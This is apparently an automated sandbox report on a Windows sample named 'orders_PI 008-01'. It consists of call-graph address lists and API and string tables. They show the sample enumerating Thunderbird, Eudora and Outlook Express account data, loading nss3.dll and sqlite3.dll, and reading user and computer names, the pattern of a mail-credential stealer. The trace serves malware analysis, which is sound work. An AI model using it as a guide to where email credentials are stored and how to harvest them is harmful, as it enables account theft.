33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34067 409ded SendMessageA ??2@YAPAXI 
??3@YAXPAX 33490->34067 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34068 406d1a CreateFileA 33493->34068 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34069 406c62 LoadCursorA SetCursor 33497->34069 34073 406d77 9 API calls 33498->34073 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34071 40a699 12 API calls 33502->34071 33503 40b042 33503->33502 33503->33509 34070 40a57c strlen WriteFile 33503->34070 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34072 406d77 9 API calls 33509->34072 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 
410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33560 401e9e strlen strlen 33560->33428 33560->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33560 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33560 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 
FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33903 402bd1 40 API calls 33659->33903 33768 410a9c RegOpenKeyExA 33660->33768 33663 403d0a 33664 403d1c 33663->33664 33904 402bd1 40 API calls 33663->33904 33769 402c5d 33664->33769 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33787 410a9c RegOpenKeyExA 33669->33787 33671 403d51 33672 403d61 33671->33672 33905 402b22 47 API calls 33671->33905 33788 410a9c RegOpenKeyExA 33672->33788 33675 403d87 33676 403d97 33675->33676 33906 402b22 47 API calls 33675->33906 33789 410a9c RegOpenKeyExA 33676->33789 33679 403dbd 33680 403dcd 33679->33680 33907 402b22 47 API calls 33679->33907 33790 410808 33680->33790 33684 404785 FreeLibrary 33685 403de8 33684->33685 33794 402fdb 33685->33794 33688 402fdb 34 API calls 33689 403e00 33688->33689 33810 4032b7 33689->33810 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33857 40fb00 33700->33857 33909 40f334 334 API calls 33701->33909 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33910 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33910 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33911 4021b6 memset 33716->33911 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33912 
4023e5 16 API calls 33719->33912 33720->33719 33723 4085e2 33722->33723 33913 4082cd 11 API calls 33723->33913 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33916 410b62 RegEnumKeyExA 33729->33916 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33917 410a9c RegOpenKeyExA 33731->33917 33920 410b62 RegEnumKeyExA 33731->33920 33732->33728 33918 410add RegQueryValueExA 33734->33918 33737 408694 33919 40848b 10 API calls 33737->33919 33739 4086ab RegCloseKey 33739->33731 33921 410a9c RegOpenKeyExA 33740->33921 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33922 410b62 RegEnumKeyExA 33744->33922 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33923 410a9c RegOpenKeyExA 33748->33923 33924 4080ed 11 API calls 33748->33924 33925 410b62 RegEnumKeyExA 33748->33925 33751 4082a2 RegCloseKey 33751->33748 33926 4045db 33752->33926 33757 408737 wcslen 33758 4088ef 33757->33758 33764 40876a 33757->33764 33934 404656 33758->33934 33759 40877a wcsncmp 33759->33764 33761 404734 3 API calls 33761->33764 33762 404785 FreeLibrary 33762->33764 33763 408812 memset 33763->33764 33765 40883c memcpy wcschr 33763->33765 33764->33758 33764->33759 33764->33761 33764->33762 33764->33763 33764->33765 33766 4088c3 LocalFree 33764->33766 33937 40466b _mbscpy 33764->33937 33765->33764 33766->33764 33767 410a9c RegOpenKeyExA 33767->33659 33768->33663 33938 410a9c RegOpenKeyExA 33769->33938 33771 402c7a 33772 402da5 33771->33772 33773 402c87 memset 33771->33773 33772->33668 33939 410b62 RegEnumKeyExA 33773->33939 33775 402d9c RegCloseKey 33775->33772 33776 410b1e 3 API calls 33777 402ce4 memset sprintf 33776->33777 33940 410a9c RegOpenKeyExA 33777->33940 33779 402d28 33780 402d3a sprintf 33779->33780 33941 402bd1 40 API calls 33779->33941 33942 410a9c RegOpenKeyExA 33780->33942 33783 402cb2 33783->33775 33783->33776 33786 402d9a 33783->33786 33943 
402bd1 40 API calls 33783->33943 33944 410b62 RegEnumKeyExA 33783->33944 33786->33775 33787->33671 33788->33675 33789->33679 33791 410816 33790->33791 33792 4107f1 FreeLibrary 33791->33792 33793 403ddd 33792->33793 33793->33684 33945 410a9c RegOpenKeyExA 33794->33945 33796 402ff9 33797 403006 memset 33796->33797 33798 40312c 33796->33798 33946 410b62 RegEnumKeyExA 33797->33946 33798->33688 33800 403122 RegCloseKey 33800->33798 33801 410b1e 3 API calls 33802 403058 memset sprintf 33801->33802 33947 410a9c RegOpenKeyExA 33802->33947 33804 403033 33804->33800 33804->33801 33805 4030a2 memset 33804->33805 33806 410b62 RegEnumKeyExA 33804->33806 33808 4030f9 RegCloseKey 33804->33808 33949 402db3 26 API calls 33804->33949 33948 410b62 RegEnumKeyExA 33805->33948 33806->33804 33808->33804 33811 4032d5 33810->33811 33812 4033a9 33810->33812 33950 4021b6 memset 33811->33950 33825 4034e4 memset memset 33812->33825 33814 4032e1 33951 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33814->33951 33816 4032ea 33817 4032f8 memset GetPrivateProfileSectionA 33816->33817 33952 4023e5 16 API calls 33816->33952 33817->33812 33822 40332f 33817->33822 33819 40339b strlen 33819->33812 33819->33822 33821 403350 strchr 33821->33822 33822->33812 33822->33819 33953 4021b6 memset 33822->33953 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33822->33954 33955 4023e5 16 API calls 33822->33955 33826 410b1e 3 API calls 33825->33826 33827 40353f 33826->33827 33828 40357f 33827->33828 33829 403546 _mbscpy 33827->33829 33833 403985 33828->33833 33956 406d55 strlen _mbscat 33829->33956 33831 403565 _mbscat 33957 4033f0 19 API calls 33831->33957 33958 40466b _mbscpy 33833->33958 33837 4039aa 33838 4039ff 33837->33838 33959 40f460 memset memset 33837->33959 33980 40f6e2 33837->33980 33996 4038e8 21 API calls 33837->33996 33840 404785 FreeLibrary 33838->33840 33841 403a0b 33840->33841 33842 4037ca memset memset 33841->33842 34004 444551 memset 33842->34004 33845 4038e2 
33845->33698 33908 40f334 334 API calls 33845->33908 33847 40382e 33848 406f06 2 API calls 33847->33848 33849 403843 33848->33849 33850 406f06 2 API calls 33849->33850 33851 403855 strchr 33850->33851 33852 403884 _mbscpy 33851->33852 33853 403897 strlen 33851->33853 33854 4038bf _mbscpy 33852->33854 33853->33854 33855 4038a4 sprintf 33853->33855 34016 4023e5 16 API calls 33854->34016 33855->33854 33858 44b090 33857->33858 33859 40fb10 RegOpenKeyExA 33858->33859 33860 403e7f 33859->33860 33861 40fb3b RegOpenKeyExA 33859->33861 33871 40f96c 33860->33871 33862 40fb55 RegQueryValueExA 33861->33862 33863 40fc2d RegCloseKey 33861->33863 33864 40fc23 RegCloseKey 33862->33864 33865 40fb84 33862->33865 33863->33860 33864->33863 33866 404734 3 API calls 33865->33866 33867 40fb91 33866->33867 33867->33864 33868 40fc19 LocalFree 33867->33868 33869 40fbdd memcpy memcpy 33867->33869 33868->33864 34021 40f802 11 API calls 33869->34021 33872 4070ae GetVersionExA 33871->33872 33873 40f98d 33872->33873 33874 4045db 7 API calls 33873->33874 33882 40f9a9 33874->33882 33875 40fae6 33876 404656 FreeLibrary 33875->33876 33877 403e85 33876->33877 33883 4442ea memset 33877->33883 33878 40fa13 memset WideCharToMultiByte 33879 40fa43 _strnicmp 33878->33879 33878->33882 33880 40fa5b WideCharToMultiByte 33879->33880 33879->33882 33881 40fa88 WideCharToMultiByte 33880->33881 33880->33882 33881->33882 33882->33875 33882->33878 33884 410dbb 9 API calls 33883->33884 33885 444329 33884->33885 34022 40759e strlen strlen 33885->34022 33890 410dbb 9 API calls 33891 444350 33890->33891 33892 40759e 3 API calls 33891->33892 33893 44435a 33892->33893 33894 444212 65 API calls 33893->33894 33895 444366 memset memset 33894->33895 33896 410b1e 3 API calls 33895->33896 33897 4443b9 ExpandEnvironmentStringsA strlen 33896->33897 33898 4443f4 _strcmpi 33897->33898 33899 4443e5 33897->33899 33900 403e91 33898->33900 33901 44440c 33898->33901 33899->33898 33900->33478 33902 444212 65 API calls 33901->33902 
33902->33900 33903->33660 33904->33664 33905->33672 33906->33676 33907->33680 33908->33698 33909->33700 33910->33713 33911->33718 33912->33714 33914 40841c 33913->33914 33915 410a9c RegOpenKeyExA 33914->33915 33915->33727 33916->33731 33917->33731 33918->33737 33919->33739 33920->33731 33921->33742 33922->33748 33923->33748 33924->33751 33925->33748 33927 404656 FreeLibrary 33926->33927 33928 4045e3 LoadLibraryA 33927->33928 33929 404651 33928->33929 33930 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33928->33930 33929->33757 33929->33758 33931 40463d 33930->33931 33932 404643 33931->33932 33933 404656 FreeLibrary 33931->33933 33932->33929 33933->33929 33935 403cd2 33934->33935 33936 40465c FreeLibrary 33934->33936 33935->33767 33936->33935 33937->33764 33938->33771 33939->33783 33940->33779 33941->33780 33942->33783 33943->33783 33944->33783 33945->33796 33946->33804 33947->33804 33948->33804 33949->33804 33950->33814 33951->33816 33952->33817 33953->33821 33954->33822 33955->33822 33956->33831 33957->33828 33958->33837 33997 4078ba 33959->33997 33962 4078ba _mbsnbcat 33963 40f5a3 RegOpenKeyExA 33962->33963 33964 40f5c3 RegQueryValueExA 33963->33964 33965 40f6d9 33963->33965 33966 40f6d0 RegCloseKey 33964->33966 33967 40f5f0 33964->33967 33965->33837 33966->33965 33967->33966 33968 40f675 33967->33968 34001 40466b _mbscpy 33967->34001 33968->33966 34002 4012ee strlen 33968->34002 33970 40f611 33972 404734 3 API calls 33970->33972 33977 40f616 33972->33977 33973 40f69e RegQueryValueExA 33973->33966 33974 40f6c1 33973->33974 33974->33966 33975 40f66a 33976 404785 FreeLibrary 33975->33976 33976->33968 33977->33975 33978 40f661 LocalFree 33977->33978 33979 40f645 memcpy 33977->33979 33978->33975 33979->33978 34003 40466b _mbscpy 33980->34003 33982 40f6fa 33983 4045db 7 API calls 33982->33983 33984 40f708 33983->33984 33985 40f7e2 33984->33985 33986 404734 3 API calls 33984->33986 33987 404656 FreeLibrary 33985->33987 33991 40f715 
33986->33991 33988 40f7f1 33987->33988 33989 404785 FreeLibrary 33988->33989 33990 40f7fc 33989->33990 33990->33837 33991->33985 33992 40f797 WideCharToMultiByte 33991->33992 33993 40f7b8 strlen 33992->33993 33994 40f7d9 LocalFree 33992->33994 33993->33994 33995 40f7c8 _mbscpy 33993->33995 33994->33985 33995->33994 33996->33837 33998 4078e6 33997->33998 33999 4078c7 _mbsnbcat 33998->33999 34000 4078ea 33998->34000 33999->33998 34000->33962 34001->33970 34002->33973 34003->33982 34017 410a9c RegOpenKeyExA 34004->34017 34006 44458b 34007 40381a 34006->34007 34018 410add RegQueryValueExA 34006->34018 34007->33845 34015 4021b6 memset 34007->34015 34009 4445dc RegCloseKey 34009->34007 34010 4445a4 34010->34009 34019 410add RegQueryValueExA 34010->34019 34012 4445c1 34012->34009 34020 444879 30 API calls 34012->34020 34014 4445da 34014->34009 34015->33847 34016->33845 34017->34006 34018->34010 34019->34012 34020->34014 34021->33868 34023 4075c9 34022->34023 34024 4075bb _mbscat 34022->34024 34025 444212 34023->34025 34024->34023 34042 407e9d 34025->34042 34028 44424d 34029 444274 34028->34029 34030 444258 34028->34030 34050 407ef8 34028->34050 34031 407e9d 9 API calls 34029->34031 34063 444196 52 API calls 34030->34063 34038 4442a0 34031->34038 34033 407ef8 9 API calls 34033->34038 34034 4442ce 34060 407f90 34034->34060 34038->34033 34038->34034 34040 444212 65 API calls 34038->34040 34064 407e62 strcmp strcmp 34038->34064 34039 407f90 FindClose 34041 4442e4 34039->34041 34040->34038 34041->33890 34043 407f90 FindClose 34042->34043 34044 407eaa 34043->34044 34045 406f06 2 API calls 34044->34045 34046 407ebd strlen strlen 34045->34046 34047 407ee1 34046->34047 34048 407eea 34046->34048 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34047->34065 34048->34028 34051 407f03 FindFirstFileA 34050->34051 34052 407f24 FindNextFileA 34050->34052 34053 407f3f 34051->34053 34054 407f46 strlen strlen 34052->34054 34055 407f3a 34052->34055 34053->34054 34057 407f7f 34053->34057 
34054->34057 34058 407f76 34054->34058 34056 407f90 FindClose 34055->34056 34056->34053 34057->34028 34066 4070e3 strlen _mbscat _mbscpy _mbscat 34058->34066 34061 407fa3 34060->34061 34062 407f99 FindClose 34060->34062 34061->34039 34062->34061 34063->34028 34064->34038 34065->34048 34066->34057 34067->33492 34068->33496 34069->33503 34070->33502 34071->33509 34072->33506 34073->33501 34418 43ffc8 18 API calls 34232 4281cc 15 API calls __fprintf_l 34420 4383cc 110 API calls __fprintf_l 34233 4275d3 41 API calls 34421 4153d3 22 API calls __fprintf_l 34234 444dd7 _XcptFilter 34426 4013de 15 API calls 34428 425115 111 API calls __fprintf_l 34429 43f7db 18 API calls 34432 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34236 4335ee 16 API calls __fprintf_l 34434 429fef 11 API calls 34237 444deb _exit _c_exit 34435 40bbf0 138 API calls 34240 425115 79 API calls __fprintf_l 34439 437ffa 22 API calls 34244 4021ff 14 API calls 34245 43f5fc 149 API calls 34440 40e381 9 API calls 34247 405983 40 API calls 34248 42b186 27 API calls __fprintf_l 34249 427d86 76 API calls 34250 403585 20 API calls 34252 42e58e 18 API calls __fprintf_l 34255 425115 75 API calls __fprintf_l 34257 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34444 434395 16 API calls 34259 441d9c memcmp 34446 43f79b 119 API calls 34260 40c599 43 API calls 34447 426741 87 API calls 34264 4401a6 21 API calls 34266 426da6 memcpy memset memset memcpy 34267 4335a5 15 API calls 34269 4299ab memset memset memcpy memset memset 34270 40b1ab 8 API calls 34452 425115 76 API calls __fprintf_l 34456 4113b2 18 API calls 2 library calls 34460 40a3b8 memset sprintf SendMessageA 34074 410bbc 34077 4109cf 34074->34077 34078 4109dc 34077->34078 34079 410a23 memset GetPrivateProfileStringA 34078->34079 34080 
4109ea memset 34078->34080 34085 407646 strlen 34079->34085 34090 4075cd sprintf memcpy 34080->34090 34083 410a0c WritePrivateProfileStringA 34084 410a65 34083->34084 34086 40765a 34085->34086 34087 40765c 34085->34087 34086->34084 34089 4076a3 34087->34089 34091 40737c strtoul 34087->34091 34089->34084 34090->34083 34091->34087 34272 40b5bf memset memset _mbsicmp

                                        Control-flow Graph

                                        control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                        APIs
                                        • memset.MSVCRT ref: 0040832F
                                        • memset.MSVCRT ref: 00408343
                                        • memset.MSVCRT ref: 0040835F
                                        • memset.MSVCRT ref: 00408376
                                        • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                        • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                        • strlen.MSVCRT ref: 004083E9
                                        • strlen.MSVCRT ref: 004083F8
                                        • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                        • String ID: 5$H$O$b$i$}$}
                                        • API String ID: 1832431107-3760989150
                                        • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                        • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                        • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                        • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                        Control-flow Graph

                                        control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 453 407f3f-407f44 451->453 454 407f46-407f74 strlen * 2 452->454 455 407f3a call 407f90 452->455 453->454 457 407f89-407f8f 453->457 458 407f83 454->458 459 407f76-407f81 call 4070e3 454->459 455->453 461 407f86-407f88 458->461 459->461 461->457
                                        APIs
                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                        • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                        • strlen.MSVCRT ref: 00407F5C
                                        • strlen.MSVCRT ref: 00407F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFindstrlen$FirstNext
                                        • String ID: ACD
                                        • API String ID: 379999529-620537770
                                        • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                        • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                        • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                        • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00401E8B
                                        • strlen.MSVCRT ref: 00401EA4
                                        • strlen.MSVCRT ref: 00401EB2
                                        • strlen.MSVCRT ref: 00401EF8
                                        • strlen.MSVCRT ref: 00401F06
                                        • memset.MSVCRT ref: 00401FB1
                                        • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                        • memset.MSVCRT ref: 00402003
                                        • sprintf.MSVCRT ref: 00402030
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • memset.MSVCRT ref: 00402086
                                        • memset.MSVCRT ref: 0040209B
                                        • strlen.MSVCRT ref: 004020A1
                                        • strlen.MSVCRT ref: 004020AF
                                        • strlen.MSVCRT ref: 004020E2
                                        • strlen.MSVCRT ref: 004020F0
                                        • memset.MSVCRT ref: 00402018
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                        • API String ID: 1846531875-4223776976
                                        • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                        • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                        • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                        • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                          • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                          • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                          • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                        • DeleteObject.GDI32(?), ref: 0040D1A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                        • API String ID: 745651260-375988210
